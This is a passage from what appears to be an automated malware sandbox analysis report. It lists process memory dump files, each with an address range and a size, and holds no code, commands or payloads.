                                                                • memory/1252-59-0x0000000000000000-mapping.dmp
                                                                • memory/1252-63-0x0000000002350000-0x00000000023D0000-memory.dmp
                                                                  Filesize

                                                                  512KB

                                                                • memory/1252-62-0x000007FEECA20000-0x000007FEED57D000-memory.dmp
                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1252-64-0x000000001B790000-0x000000001BA8F000-memory.dmp
                                                                  Filesize

                                                                  3.0MB

                                                                • memory/1272-243-0x0000000000370000-0x000000000039A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1296-66-0x0000000000000000-mapping.dmp
                                                                • memory/1324-247-0x0000000002940000-0x000000000296A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1324-248-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/1404-79-0x0000000000000000-mapping.dmp
                                                                • memory/1448-72-0x0000000000000000-mapping.dmp
                                                                • memory/1484-135-0x0000000076F90000-0x0000000077139000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1484-123-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp
                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1484-136-0x0000000076E70000-0x0000000076F8F000-memory.dmp
                                                                  Filesize

                                                                  1.1MB

                                                                • memory/1484-118-0x0000000000000000-mapping.dmp
                                                                • memory/1484-122-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp
                                                                  Filesize

                                                                  10.1MB

                                                                • memory/1484-133-0x00000000009EB000-0x0000000000A0A000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1484-131-0x00000000009E4000-0x00000000009E7000-memory.dmp
                                                                  Filesize

                                                                  12KB

                                                                • memory/1484-126-0x0000000076E70000-0x0000000076F8F000-memory.dmp
                                                                  Filesize

                                                                  1.1MB

                                                                • memory/1484-125-0x0000000076F90000-0x0000000077139000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1484-124-0x00000000009E4000-0x00000000009E7000-memory.dmp
                                                                  Filesize

                                                                  12KB

                                                                • memory/1496-80-0x0000000000000000-mapping.dmp
                                                                • memory/1524-76-0x0000000000000000-mapping.dmp
                                                                • memory/1532-85-0x0000000000000000-mapping.dmp
                                                                • memory/1560-111-0x0000000000000000-mapping.dmp
                                                                • memory/1568-89-0x0000000000000000-mapping.dmp
                                                                • memory/1660-90-0x0000000000000000-mapping.dmp
                                                                • memory/1684-93-0x0000000000000000-mapping.dmp
                                                                • memory/1684-277-0x0000000000100000-0x0000000000121000-memory.dmp
                                                                  Filesize

                                                                  132KB

                                                                • memory/1684-260-0x00000000004039E0-mapping.dmp
                                                                • memory/1684-276-0x00000000000E0000-0x00000000000FB000-memory.dmp
                                                                  Filesize

                                                                  108KB

                                                                • memory/1684-274-0x0000000077170000-0x00000000772F0000-memory.dmp
                                                                  Filesize

                                                                  1.5MB

                                                                • memory/1684-272-0x0000000000400000-0x0000000000435000-memory.dmp
                                                                  Filesize

                                                                  212KB

                                                                • memory/1716-115-0x0000000000000000-mapping.dmp
                                                                • memory/1736-83-0x0000000000000000-mapping.dmp
                                                                • memory/1744-88-0x0000000000000000-mapping.dmp
                                                                • memory/1768-91-0x0000000000000000-mapping.dmp
                                                                • memory/1780-87-0x0000000000000000-mapping.dmp
                                                                • memory/1828-68-0x0000000000000000-mapping.dmp
                                                                • memory/1844-116-0x0000000000000000-mapping.dmp
                                                                • memory/1904-74-0x0000000000000000-mapping.dmp
                                                                • memory/1904-113-0x0000000000000000-mapping.dmp
                                                                • memory/1952-94-0x0000000002840000-0x0000000002846000-memory.dmp
                                                                  Filesize

                                                                  24KB

                                                                • memory/1952-54-0x0000000000880000-0x000000000120A000-memory.dmp
                                                                  Filesize

                                                                  9.5MB

                                                                • memory/1952-58-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp
                                                                  Filesize

                                                                  8KB

                                                                • memory/1952-57-0x000000001C2F0000-0x000000001C750000-memory.dmp
                                                                  Filesize

                                                                  4.4MB

                                                                • memory/1956-251-0x0000000000130000-0x000000000015A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1956-252-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/2032-92-0x0000000000000000-mapping.dmp